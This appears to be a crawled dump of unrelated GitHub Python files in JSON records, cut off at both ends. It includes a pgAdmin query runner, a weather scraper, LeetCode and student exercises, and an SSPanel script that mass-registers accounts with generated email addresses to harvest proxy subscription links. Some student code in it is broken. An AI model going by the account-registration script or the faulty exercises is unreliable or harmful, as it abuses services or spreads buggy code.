'win32' else False\nisDebug = True if sys.gettrace() else False\n\n\ndef do_help():\n print(sys.argv[0], \"\"\"[选项 [值]] 或 [选项=[值]]\n -u,--url URL : 设置 URL\n -t,-token TOKEN : 设置 TOKEN\n --h,--help : 显示这个帮助\n -g,--gui : 开启图形界面\"\"\")\n quit()\n\n\ndef do_rule(new_str: str, rule=\".\"):\n \"\"\"判断字符是否存在, 不存在退出程序\"\"\"\n if rule in new_str:\n return new_str\n else:\n print(\"不符合规则: \", new_str)\n quit()\n\n\n# 开始解析\ni = 1\narg = sys.argv\nwhile i < len(arg):\n if arg[i][0] == \"-\":\n if arg[i][1] == \"-\":\n if arg[i][2:5] == \"url\":\n if len(arg[i]) > 5 and arg[i][5] == \"=\":\n # --url=(url)\n url = do_rule(arg[i][6:])\n else:\n # --url (url)\n i += 1\n url = do_rule(arg[i])\n elif arg[i][2:7] == \"token\":\n if len(arg[i]) > 7 and arg[i][7] == \"=\":\n # --token=(token)\n tok = do_rule(arg[i][8:], \"=\")\n else:\n # --token (token)\n i += 1\n tok = do_rule(arg[i], \"=\")\n elif arg[i][2:] == \"help\":\n # --help\n do_help()\n elif arg[i][2:] == \"gui\":\n # --gui\n gui = True\n elif arg[i][1] == \"u\":\n if len(arg[i]) > 2 and arg[i][2] == \"=\":\n # -u=(url)\n url = do_rule(arg[i][3:])\n else:\n # -u=(url)\n i += 1\n url = do_rule(arg[i])\n elif arg[i][1] == \"t\":\n if len(arg[i]) > 2 and arg[i][2] == \"=\":\n # -t=(token)\n tok = do_rule(arg[i][3:], \"=\")\n else:\n # -t (token)\n i += 1\n tok = do_rule(arg[i], \"=\")\n elif arg[i][1] == \"h\":\n do_help()\n elif arg[i][1] == \"g\":\n # -g\n gui = True\n if \".\" in arg[i]:\n url = do_rule(arg[i])\n if \"=\" in arg[i]:\n tok = do_rule(arg[i], \"=\")\n i += 1\n\nif isDebug:\n print(\"argv:\", sys.argv)\n print(\"url:\", url, end=\" \")\n print(\"token:\", tok)\n print(\"gui:\", gui)\n\n\nsspanel_get=SSPANEL_GET(url,tok,vcode)\n\n\ndef __button():\n \"\"\"获取订阅链接按钮被按下\"\"\"\n global url, tok, email_num\n url = entry_url.get()\n tok = entry_token.get()\n email_num = sspanel_get.email_num\n button.configure(state=\"disabled\")\n email_text.set(str(email_num) + '@' + sspanel_get.domain)\n # 注册\n back_reg = sspanel_get.reg()\n if back_reg == \"注册成功!正在进入登录界面\":\n button.configure(text=back_reg)\n # 登录\n back_login = sspanel_get.login()\n if back_login == \"登录成功\":\n button.configure(text=back_login)\n # 获取用户中心网页HTML\n back_user = sspanel_get.get_sub(sspanel_get.user())\n pyperclip.copy(back_user)\n url_text.set(back_user)\n \n else:\n messagebox.showerror(\"错误\", \"登录失败!\")\n button.configure(text=\"获取订阅链接\")\n else:\n messagebox.showinfo(\"注册失败\", back_reg)\n button.configure(state=\"normal\")\n\n\nif gui:\n try:\n import pyperclip\n except ImportError:\n print('[!] requests 模块未安装,请使用 pip3 install pyperclip 安装')\n sys.exit(1)\n\n root = tkinter.Tk()\n # 窗口标题\n root.title(\"订阅链接获取\")\n # 窗口大小\n root.geometry(\"245x123\")\n # 窗口图标\n # root.resizable(0, 0)\n # 窗口背景颜色\n root.configure(background=\"white\")\n\n\n def button_click():\n \"\"\"按钮点击事件\"\"\"\n threading.Thread(target=__button).start()\n\n\n # 窗口内容\n # 按钮\n button = tkinter.Button(root, text=\"获取订阅链接\", width=267, font=(\"微软雅黑\", 12), command=button_click)\n button.pack()\n\n # 标签_url\n label_url = tkinter.Label(root, text=\"订阅源\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_url.place(x=6, y=37)\n # 输入框_url\n entry_url = tkinter.Entry(root, width=20, font=(\"微软雅黑\", 10))\n entry_url.insert(0, url)\n entry_url.place(x=60, y=37)\n\n # 标签_token\n label_token = tkinter.Label(root, text=\"token\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_token.place(x=7, y=57)\n # 输入框_token\n entry_token = tkinter.Entry(root, width=20, font=(\"微软雅黑\", 10))\n entry_token.insert(0, tok)\n entry_token.place(x=60, y=57)\n\n # 标签_邮箱\n label_email = tkinter.Label(root, text=\"邮箱\", width=6, bg=\"white\", font=(\"微软雅黑\", 10))\n label_email.place(x=0, y=77)\n # 文本框_邮箱\n email_text = tkinter.StringVar()\n entry_email = tkinter.Entry(root, width=20, state=\"readonly\", font=(\"微软雅黑\", 12),textvariable=email_text)\n entry_email.configure(state=\"readonly\")\n entry_email.place(x=60, y=77)\n\n # 标签_订阅链接\n label_dy_url = tkinter.Label(root, text=\"订阅地址\", bg=\"white\", font=(\"微软雅黑\", 10))\n label_dy_url.place(x=0, y=97)\n # 文本框_订阅链接\n url_text = tkinter.StringVar()\n entry_dy_url = tkinter.Entry(root, width=20, state=\"readonly\", font=(\"微软雅黑\", 12),textvariable=url_text)\n entry_dy_url.configure(state=\"readonly\")\n entry_dy_url.place(x=60, y=97)\n\n root.mainloop()\nelse:\n email_num = sspanel_get.get_email()\n print(str(email_num) + \"@qs.com\")\n # 注册\n back = sspanel_get.reg()\n print(back)\n if back == \"注册成功!正在进入登录界面\":\n # 登录\n back = sspanel_get.login()\n print(back, end=\"\\n\\n\")\n if back == \"登录成功\":\n # 获取用户中心网页HTML\n user_back = sspanel_get.get_sub(sspanel_get.user())\n print(user_back)\n","repo_name":"Qs315490/SSPANEL_GET","sub_path":"python/GUI.pyw","file_name":"GUI.pyw","file_ext":"pyw","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"23438436049","text":"import pickle\nimport random\n\nfrom flask import Response\nfrom flask_babelex import gettext\n\nfrom config import PG_DEFAULT_DRIVER\nfrom pgadmin.tools.sqleditor.utils.apply_explain_plan_wrapper import \\\n apply_explain_plan_wrapper_if_needed\nfrom pgadmin.tools.sqleditor.utils.constant_definition import TX_STATUS_IDLE, \\\n TX_STATUS_INERROR\nfrom pgadmin.tools.sqleditor.utils.is_begin_required import is_begin_required\nfrom pgadmin.tools.sqleditor.utils.update_session_grid_transaction import \\\n update_session_grid_transaction\nfrom pgadmin.utils.ajax import make_json_response, internal_server_error\nfrom pgadmin.utils.driver import get_driver\nfrom pgadmin.utils.exception import ConnectionLost, SSHTunnelConnectionLost\n\n\nclass StartRunningQuery:\n\n def __init__(self, blueprint_object, logger):\n self.http_session = None\n self.blueprint_object = blueprint_object\n self.connection_id = str(random.randint(1, 9999999))\n self.logger = logger\n\n def execute(self, sql, trans_id, http_session, connect=False):\n session_obj = StartRunningQuery.retrieve_session_information(\n http_session,\n trans_id\n )\n if type(session_obj) is Response:\n return session_obj\n\n transaction_object = pickle.loads(session_obj['command_obj'])\n can_edit = False\n can_filter = False\n notifies = None\n if transaction_object is not None and session_obj is not None:\n # set fetched row count to 0 as we are executing query again.\n transaction_object.update_fetched_row_cnt(0)\n self.__retrieve_connection_id(transaction_object)\n\n try:\n manager = get_driver(\n PG_DEFAULT_DRIVER).connection_manager(\n transaction_object.sid)\n conn = manager.connection(did=transaction_object.did,\n conn_id=self.connection_id,\n auto_reconnect=False,\n use_binary_placeholder=True,\n array_to_string=True)\n except (ConnectionLost, SSHTunnelConnectionLost):\n raise\n except Exception as e:\n self.logger.error(e)\n return internal_server_error(errormsg=str(e))\n\n # Connect to the Server if not connected.\n if connect and not conn.connected():\n status, msg = conn.connect()\n if not status:\n self.logger.error(msg)\n return internal_server_error(errormsg=str(msg))\n\n effective_sql_statement = apply_explain_plan_wrapper_if_needed(\n manager, sql)\n\n result, status = self.__execute_query(\n conn,\n session_obj,\n effective_sql_statement,\n trans_id,\n transaction_object\n )\n\n can_edit = transaction_object.can_edit()\n can_filter = transaction_object.can_filter()\n\n # Get the notifies\n notifies = conn.get_notifies()\n else:\n status = False\n result = gettext(\n 'Either transaction object or session object not found.')\n return make_json_response(\n data={\n 'status': status, 'result': result,\n 'can_edit': can_edit, 'can_filter': can_filter,\n 'info_notifier_timeout':\n self.blueprint_object.info_notifier_timeout.get(),\n 'notifies': notifies\n }\n )\n\n def __retrieve_connection_id(self, trans_obj):\n conn_id = trans_obj.conn_id\n # if conn_id is None then we will have to create a new connection\n if conn_id is not None:\n self.connection_id = conn_id\n\n def __execute_query(self, conn, session_obj, sql, trans_id, trans_obj):\n # on successful connection set the connection id to the\n # transaction object\n trans_obj.set_connection_id(self.connection_id)\n\n StartRunningQuery.save_transaction_in_session(session_obj,\n trans_id, trans_obj)\n\n # If auto commit is False and transaction status is Idle\n # then call is_begin_not_required() function to check BEGIN\n # is required or not.\n\n if StartRunningQuery.is_begin_required_for_sql_query(trans_obj,\n conn, sql):\n conn.execute_void(\"BEGIN;\")\n\n # Execute sql asynchronously with params is None\n # and formatted_error is True.\n try:\n status, result = conn.execute_async(sql)\n except (ConnectionLost, SSHTunnelConnectionLost):\n raise\n\n # If the transaction aborted for some reason and\n # Auto RollBack is True then issue a rollback to cleanup.\n if StartRunningQuery.is_rollback_statement_required(trans_obj,\n conn):\n conn.execute_void(\"ROLLBACK;\")\n\n return result, status\n\n @staticmethod\n def is_begin_required_for_sql_query(trans_obj, conn, sql):\n return (not trans_obj.auto_commit and\n conn.transaction_status() == TX_STATUS_IDLE and\n is_begin_required(sql)\n )\n\n @staticmethod\n def is_rollback_statement_required(trans_obj, conn):\n return (\n conn.transaction_status() == TX_STATUS_INERROR and\n trans_obj.auto_rollback\n )\n\n @staticmethod\n def save_transaction_in_session(session, transaction_id, transaction):\n # As we changed the transaction object we need to\n # restore it and update the session variable.\n session['command_obj'] = pickle.dumps(transaction, -1)\n update_session_grid_transaction(transaction_id, session)\n\n @staticmethod\n def retrieve_session_information(http_session, transaction_id):\n if 'gridData' not in http_session:\n return make_json_response(\n success=0,\n errormsg=gettext('Transaction ID not found in the session.'),\n info='DATAGRID_TRANSACTION_REQUIRED', status=404\n )\n grid_data = http_session['gridData']\n # Return from the function if transaction id not found\n if str(transaction_id) not in grid_data:\n return make_json_response(\n success=0,\n errormsg=gettext('Transaction ID not found in the session.'),\n info='DATAGRID_TRANSACTION_REQUIRED',\n status=404\n )\n # Fetch the object for the specified transaction id.\n # Use pickle.loads function to get the command object\n return grid_data[str(transaction_id)]\n","repo_name":"SkyAI/PGAdmin4HAWQ","sub_path":"web/pgadmin/tools/sqleditor/utils/start_running_query.py","file_name":"start_running_query.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"36217754576","text":"chenn=\"5 45 123 12\"\nchenn_nan=chenn.split(\" \")\npwod=1\nfor i in chenn_nan:\n s=0\n for k in range(len(i)):\n s+=int(i[k])\n pwod*=s\nprint(pwod)\n\n \n \n \n ","repo_name":"Kalmds509/challenge-","sub_path":"enonse5.py","file_name":"enonse5.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73978145059","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\naddressToScrapeFrom = 'https://forecast.weather.gov/MapClick.php?lat=34.053570000000036&lon=-118.24544999999995'\n\npage = requests.get( addressToScrapeFrom )\nsoup = BeautifulSoup ( page.content, 'html.parser' )\n\n# get the full source code of the page - uncomment next line\n# print(soup)\n\n# get all a tags (links) - uncomment next line\n# print(soup.find_all('a')) \n\nweek = soup.find( id='seven-day-forecast-container' )\n\n# get the html inside of the element with id='seven-day-forecast-container' - uncomment next line\n# print( week )\n\nitems = week.find_all( class_='tombstone-container' )\n\n# get all items - uncomment next line\n# print( items )\n\n# get specific item - uncomment next line\n# print( items[0] )\n\n# print( items[0].find( class_='period-name' ).get_text() )\n# print( items[0].find( class_='short-desc' ).get_text() )\n# print( items[0].find( class_='temp' ).get_text() )\n\n# extract all period-names from items and put them in a list - uncomment next line\nperiod_names = [ item.find(class_='period-name').get_text() for item in items ]\nshort_descriptions = [ item.find(class_='short-desc').get_text() for item in items ]\ntemperatures = [ item.find(class_='temp').get_text() for item in items ]\n\n# print( period_names ) - uncomment next line\n# print( short_descriptions ) - uncomment next line\n# print( temperatures ) - uncomment next line\n\nweather_stuff = pd.DataFrame({ \n 'period': period_names,\n 'short_descriptions': short_descriptions,\n 'temperatures': temperatures, \n})\n\nprint( weather_stuff )\n\n# export to csv\nweather_stuff.to_csv( 'weather.csv' )","repo_name":"guergana/scraping-beautiful-soup","sub_path":"01-weather/scraping-weather.py","file_name":"scraping-weather.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21567608390","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n# recursively 递归\nclass Solution(object):\n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n return self.isEqual(root, root)\n \n def isEqual(self, left, right):\n if left == right == None:\n return True\n elif left == None or right == None:\n return False \n return left.val == right.val and self.isEqual(left.left, right.right) and self.isEqual(left.right, right.left)\n\n# iteratively 迭代\nclass Solution(object):\n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n queue = []\n if root == None:\n return True\n queue.append(root.left)\n queue.append(root.right)\n while queue:\n left = queue.pop(0)\n right = queue.pop(0)\n if left == None and right == None:\n continue\n if left == None or right == None:\n return False\n if left.val != right.val:\n return False\n queue.append(left.left)\n queue.append(right.right)\n queue.append(left.right)\n queue.append(right.left)\n return True\n","repo_name":"bingli8802/leetcode","sub_path":"0101_Symmetric_Tree.py","file_name":"0101_Symmetric_Tree.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30877399800","text":"\nwhile True:\n numero1=int(input('Ingrese un numero'))\n numero2=int(input('Ingrese un numero'))\n if numero1==numero2:\n print('los números son iguales')\n continue\n else:\n if numero1>numero2:\n print (f'El {numero1} es mayor que {numero2}') \n else:\n print (f'El {numero2} es mayor que {numero1}')\n break\n \nresultado=0\nwhile True:\n if numero1>numero2 :\n resultado=numero1-numero2 \n print(f\"el resultado de la resta de {numero1} y {numero2} es {resultado}\")\n else : numero2>numero1\n resultado = numero2 - numero1\n print(f\"el resultado de la resta de {numero1} y {numero2} es {resultado}\")\n\n if resultado-numero1:\n while resultado != 0:\n if numero1numero1\n #resultado=resultado-numero2\n #print(f\" la diferencia del resutado es {resultado}\")\n\n # if resultado<=0:\n # break\n","repo_name":"juaness007/pythoncastillo","sub_path":"Tarea1while.py","file_name":"Tarea1while.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40824341833","text":"import itertools\n\nimport jsonschema\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport psutil\nimport six\n\nfrom stackalytics.processor import config\nfrom stackalytics.processor import default_data_processor\nfrom stackalytics.processor import rcs\nfrom stackalytics.processor import record_processor\nfrom stackalytics.processor import runtime_storage\nfrom stackalytics.processor import schema\nfrom stackalytics.processor import utils\nfrom stackalytics.processor import vcs\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\n\ndef get_pids():\n result = set([])\n for pid in psutil.pids():\n try:\n p = psutil.Process(pid)\n name = p.name()\n if name == 'uwsgi':\n LOG.debug('Found uwsgi process, pid: %s', pid)\n result.add(pid)\n except Exception as e:\n LOG.debug('Exception while iterating process list: %s', e)\n pass\n\n return result\n\n\ndef update_pids(runtime_storage):\n pids = get_pids()\n if not pids:\n return\n runtime_storage.active_pids(pids)\n\n\ndef _merge_commits(original, new):\n if new['branches'] < original['branches']:\n return False\n else:\n original['branches'] |= new['branches']\n return True\n\n\ndef _record_typer(record_iterator, record_type):\n for record in record_iterator:\n record['record_type'] = record_type\n yield record\n\n\ndef _get_repo_branches(repo):\n return ({repo.get('default_branch', 'master')} |\n set(r['branch'] for r in repo.get('releases', [])\n if 'branch' in r))\n\n\ndef _process_repo_reviews(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst):\n for branch in _get_repo_branches(repo):\n LOG.info('Processing reviews for repo: %s, branch: %s',\n repo['uri'], branch)\n\n quoted_uri = six.moves.urllib.parse.quote_plus(repo['uri'])\n rcs_key = 'rcs:%s:%s' % (quoted_uri, branch)\n last_retrieval_time = runtime_storage_inst.get_by_key(rcs_key)\n current_retrieval_time = utils.date_to_timestamp('now')\n\n review_iterator = itertools.chain(\n rcs_inst.log(repo, branch, last_retrieval_time, status='open'),\n rcs_inst.log(repo, branch, last_retrieval_time, status='merged'),\n rcs_inst.log(repo, branch, last_retrieval_time, status='abandoned',\n grab_comments=True), )\n\n review_iterator_typed = _record_typer(review_iterator, 'review')\n processed_review_iterator = record_processor_inst.process(\n review_iterator_typed)\n\n runtime_storage_inst.set_records(processed_review_iterator,\n utils.merge_records)\n runtime_storage_inst.set_by_key(rcs_key, current_retrieval_time)\n\n\ndef _process_repo_vcs(repo, runtime_storage_inst, record_processor_inst):\n vcs_inst = vcs.get_vcs(repo, CONF.sources_root)\n vcs_inst.fetch()\n\n for branch in _get_repo_branches(repo):\n LOG.info('Processing commits in repo: %s, branch: %s',\n repo['uri'], branch)\n\n quoted_uri = six.moves.urllib.parse.quote_plus(repo['uri'])\n vcs_key = 'vcs:%s:%s' % (quoted_uri, branch)\n last_id = runtime_storage_inst.get_by_key(vcs_key)\n\n commit_iterator = vcs_inst.log(branch, last_id)\n commit_iterator_typed = _record_typer(commit_iterator, 'commit')\n processed_commit_iterator = record_processor_inst.process(\n commit_iterator_typed)\n runtime_storage_inst.set_records(\n processed_commit_iterator, _merge_commits)\n\n last_id = vcs_inst.get_last_id(branch)\n runtime_storage_inst.set_by_key(vcs_key, last_id)\n\n\ndef _process_repo(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst):\n LOG.info('Processing repo: %s', repo['uri'])\n\n _process_repo_vcs(repo, runtime_storage_inst, record_processor_inst)\n\n if 'has_gerrit' in repo:\n _process_repo_reviews(repo, runtime_storage_inst,\n record_processor_inst, rcs_inst)\n\n\ndef _post_process_records(record_processor_inst, repos):\n LOG.debug('Build release index')\n release_index = {}\n for repo in repos:\n vcs_inst = vcs.get_vcs(repo, CONF.sources_root)\n release_index.update(vcs_inst.fetch())\n\n LOG.debug('Post-process all records')\n record_processor_inst.post_processing(release_index)\n\n\ndef process(runtime_storage_inst, record_processor_inst):\n repos = utils.load_repos(runtime_storage_inst)\n\n rcs_inst = rcs.get_rcs(CONF.review_uri)\n# rcs_inst.setup(key_filename=CONF.ssh_key_filename,\n# username=CONF.ssh_username,\n# gerrit_retry=CONF.gerrit_retry)\n\n for repo in repos:\n _process_repo(repo, runtime_storage_inst, record_processor_inst,\n rcs_inst)\n\n rcs_inst.close()\n\n _post_process_records(record_processor_inst, repos)\n\n\ndef process_project_list(runtime_storage_inst):\n module_groups = runtime_storage_inst.get_by_key('module_groups') or {}\n\n # register modules as module groups\n repos = runtime_storage_inst.get_by_key('repos') or []\n for repo in repos:\n module = repo['module'].lower()\n module_groups[module] = utils.make_module_group(module, tag='module')\n\n # register module 'unknown' - used for emails not mapped to any module\n module_groups['unknown'] = utils.make_module_group('unknown', tag='module')\n\n runtime_storage_inst.set_by_key('module_groups', module_groups)\n\n\ndef main():\n utils.init_config_and_logging(config.CONNECTION_OPTS +\n config.PROCESSOR_OPTS)\n\n runtime_storage_inst = runtime_storage.get_runtime_storage(\n CONF.runtime_storage_uri)\n\n default_data = utils.read_json_from_uri(CONF.default_data_uri)\n if not default_data:\n LOG.critical('Unable to load default data')\n return not 0\n\n try:\n jsonschema.validate(default_data, schema.default_data)\n except jsonschema.ValidationError as e:\n LOG.critical('The default data is invalid: %s' % e)\n return not 0\n\n default_data_processor.process(runtime_storage_inst,\n default_data)\n\n process_project_list(runtime_storage_inst)\n\n update_pids(runtime_storage_inst)\n\n record_processor_inst = record_processor.RecordProcessor(\n runtime_storage_inst)\n\n process(runtime_storage_inst, record_processor_inst)\n\n runtime_storage_inst.set_by_key('runtime_storage_update_time',\n utils.date_to_timestamp('now'))\n LOG.info('stackalytics-processor succeeded.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dianaclarke/lit","sub_path":"stackalytics/processor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38876682423","text":"class fruteria:\n comercio = {\"platano\": 1.35, \"Manzana\": 0.80, \"Pera\": 0.85, \"Naranja\": 0.70}\n fruta = ''\n kilos = 0\n\n def __init__(self, f, k):\n self.fruta = f\n self.kilos = k\n\n def comprarFruta(self):\n while True:\n if self.fruta in self.comercio:\n print(\"su precio es de :\", self.comercio[self.fruta] * self.kilos)\n break\n else:\n print(\"Lo sentimos mucho no tenemos esa fruta\\nNuestra fruta:\")\n for c,v in self.comercio.items():\n print(c)\n\n self.fruta = input(\"que fruta desea: \")\n self.kilos = float(input(\"¿cuantos kilos: \"))\n\n for c, v in self.comercio.items():\n if self.fruta in c:\n print(\"su fruta: \", c, ' su precio ', v * self.kilos)\n break\n else:\n pass","repo_name":"fernado1981/python_","sub_path":"POO/Fruteria/fruteria.py","file_name":"fruteria.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74603512421","text":"#!/usr/bin/python3\n\nimport argparse\nimport sys\nimport json\nfrom ctypes import *\n\nclass InputInfo(Structure):\n _fields_ = [('computer_player_id', c_byte),\n ('starting_player_id', c_byte),\n ('played_cards', c_byte * 48),\n ('played_cards_len', c_byte),\n ('computer_player_hand', c_byte * 12),\n ('computer_player_hand_len', c_byte)]\n\ncardnames = ('cn','ck','ct','ca','sn','sk','st','sa','hn','hk','ha','dn','dk','dt','da',\n 'dj','hj','sj','cj','dq','hq','sq','cq','ht')\nconvertd = {k : i*2 for i, k in enumerate(cardnames)}\nrconvertd = { i*2 : k for i, k in enumerate(cardnames)}\nrconvertd.update( {i*2+1 : k for i,k in enumerate(cardnames)})\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-l','--lib', default='./libdoko.so',\n help='path to the libdoko shared library')\n parser.add_argument('-j','--json', type=str,\n help='input json string')\n args = parser.parse_args()\n\n libdoko = CDLL(args.lib)\n GetBestCard = libdoko.GetBestCard\n GetBestCard.argtypes = [POINTER(InputInfo)]\n GetBestCard.restype = c_byte\n\n line = args.json\n # for line in map(str.strip, sys.stdin):\n if line:\n try:\n json_info = json.loads(line)\n input_info = InputInfo()\n input_info.computer_player_id = int(json_info['computer_player_id'])\n input_info.starting_player_id = int(json_info['starting_player_id'])\n input_info.played_cards_len = len(list(json_info['played_cards']))\n for i, c in enumerate(list(json_info['played_cards'])):\n if convertd[c] in input_info.played_cards[:i]:\n input_info.played_cards[i] = convertd[c] + 1\n else:\n input_info.played_cards[i] = convertd[c]\n input_info.computer_player_hand_len = len(list(json_info['computer_player_hand']))\n for i, c in enumerate(list(json_info['computer_player_hand'])):\n if ( convertd[c] in input_info.computer_player_hand[:i] or\n convertd[c] in input_info.played_cards[:input_info.played_cards_len] ):\n input_info.computer_player_hand[i] = convertd[c] + 1\n else:\n input_info.computer_player_hand[i] = convertd[c]\n\n res = GetBestCard(pointer(input_info))\n result_info = json.dumps({'best_card': rconvertd[res]})\n print(result_info)\n except:\n print(json.dumps('error'))\n\n","repo_name":"jakob-stark/doko_mc_ai","sub_path":"utils/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"9213164602","text":"from minimal_ssz import hash_tree_root\n\n\ndef jsonize(value, typ, include_hash_tree_roots=False):\n if isinstance(typ, str) and typ[:4] == 'uint':\n return value\n elif typ == 'bool':\n assert value in (True, False)\n return value\n elif isinstance(typ, list):\n return [jsonize(element, typ[0], include_hash_tree_roots) for element in value]\n elif isinstance(typ, str) and typ[:4] == 'byte':\n return '0x' + value.hex()\n elif hasattr(typ, 'fields'):\n ret = {}\n for field, subtype in typ.fields.items():\n ret[field] = jsonize(getattr(value, field), subtype, include_hash_tree_roots)\n if include_hash_tree_roots:\n ret[field + \"_hash_tree_root\"] = '0x' + hash_tree_root(getattr(value, field), subtype).hex()\n if include_hash_tree_roots:\n ret[\"hash_tree_root\"] = '0x' + hash_tree_root(value, typ).hex()\n return ret\n else:\n print(value, typ)\n raise Exception(\"Type not recognized\")\n\n\ndef dejsonize(json, typ):\n if isinstance(typ, str) and typ[:4] == 'uint':\n return json\n elif typ == 'bool':\n assert json in (True, False)\n return json\n elif isinstance(typ, list):\n return [dejsonize(element, typ[0]) for element in json]\n elif isinstance(typ, str) and typ[:4] == 'byte':\n return bytes.fromhex(json[2:])\n elif hasattr(typ, 'fields'):\n temp = {}\n for field, subtype in typ.fields.items():\n temp[field] = dejsonize(json[field], subtype)\n if field + \"_hash_tree_root\" in json:\n assert(json[field + \"_hash_tree_root\"][2:] == \n hash_tree_root(temp[field], subtype).hex())\n ret = typ(**temp)\n if \"hash_tree_root\" in json:\n assert(json[\"hash_tree_root\"][2:] == \n hash_tree_root(ret, typ).hex())\n return ret\n else:\n print(json, typ)\n raise Exception(\"Type not recognized\")\n","repo_name":"ethereum/research","sub_path":"spec_pythonizer/jsonize.py","file_name":"jsonize.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":1683,"dataset":"github-code","pt":"35"} +{"seq_id":"26071195630","text":"from function import HeatMap\ndef getAllPlots(subsystemAtom):\n print(\"+++++++ PLOT GENERATING FOR %s +++++++\"%subsystemAtom)\n subsystem = subsystemAtom[0]\n side = subsystemAtom[1]\n folder = \"/afs/crc.nd.edu/user/h/hbhattar/Hemanta/metals/ThermalConductivity/EqulibratedSystem/\"\n #fileOut = \"%s_%s_HHAngle.eps\"%(subsystem,side)\n fileOut = \"%s_merged_HHAngle.eps\"%(subsystem)\n tailSubsystem = \"\" \n system2 = \"%s_Dynamics_TimeAdjusted\"%(subsystem)\n n2=4\n heatMap = HeatMap.HeatMap(folder)\n heatMap.set_numbers(n2)\n heatMap.set_extension(\"HHAngle\")\n heatMap.set_initial(0)\n #heatMap.set_subsystem(\"_%s_merged_smooth\"%(side))\n heatMap.set_subsystem(\"_Single_merged_smooth\")\n heatMap.set_system(system2)\n heatMap.set_deltaZ(3)\n ref = 0.005\n dev = 0.001\n heatMap.set_xlabel(\"Z\")\n heatMap.set_ylabel(\"$S_1(\\\\theta_{HH})$\")\n heatMap.set_colormaxmin(ref - dev,ref + dev)\n heatMap.set_fileOut(fileOut)\n heatMap.set_freqThreshold(1)\n heatMap.HeatMapMatrix()\n heatMap.heatMapPlot1()\n\n\n \n return subsystem\n \n\n\ndef main(): \n subsystemList=[\"MNWN\",\"MFWN\",\"MNWN_TIP4P\", \"MFWN_TIP4P\", \"MNWF\", \"MFWF\"]\n side = [\"L\", \"R\"]\n subsystemList = [ [syst, lr] for syst in subsystemList for lr in side ]\n list(map(getAllPlots,subsystemList))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Hemanta-Bhattarai/Research","sub_path":"pythonFiles/HHAngle.py","file_name":"HHAngle.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16042297195","text":"# Given a string s containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n#\n# An input string is valid if:\n#\n# Open brackets must be closed by the same type of brackets.\n# Open brackets must be closed in the correct order.\n#\n#\n# Example 1:\n#\n# Input: s = \"()\"\n# Output: true\n# Example 2:\n#\n# Input: s = \"()[]{}\"\n# Output: true\n# Example 3:\n#\n# Input: s = \"(]\"\n# Output: false\n# Example 4:\n#\n# Input: s = \"([)]\"\n# Output: false\n# Example 5:\n#\n# Input: s = \"{[]}\"\n# Output: true\n#\n#\n# Constraints:\n#\n# 1 <= s.length <= 10^4\n# s consists of parentheses only '()[]{}'.\n\n\nclass Solution:\n def isValid(self, s: str) -> bool:\n # using stack\n stack = []\n pairs = {'(': ')', '[': ']', '{': '}'}\n for c in s:\n if c in pairs:\n stack.append(c)\n elif len(stack) > 0 and c == pairs[stack[-1]]:\n stack.pop()\n else:\n return False\n return len(stack) == 0\n\n\nprint(list(map(Solution().isValid, [\"()\", \"(]\", \"{[]}\"])))\n","repo_name":"graysonliu/leetcode","sub_path":"0020_valid_parentheses.py","file_name":"0020_valid_parentheses.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15701934269","text":"from django.contrib import admin\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.urls import reverse_lazy\nfrom django.utils.safestring import mark_safe\nfrom django.contrib import admin\nfrom django.forms import ModelForm, ModelMultipleChoiceField\nfrom django.contrib.auth.admin import UserAdmin, GroupAdmin\nfrom django.contrib.admin.widgets import FilteredSelectMultiple\n\nfrom ..tasks import refresh_keycloak\nfrom ..models import SSOConfig, SSOUserProfile\nfrom shared.models import config\n\n\ndef refresh_realm(modeladmin, request, queryset):\n result = refresh_keycloak.delay()\n modeladmin.message_user(\n request,\n mark_safe(\"Tâche {} ajoutée à la file ({})\".format(\n 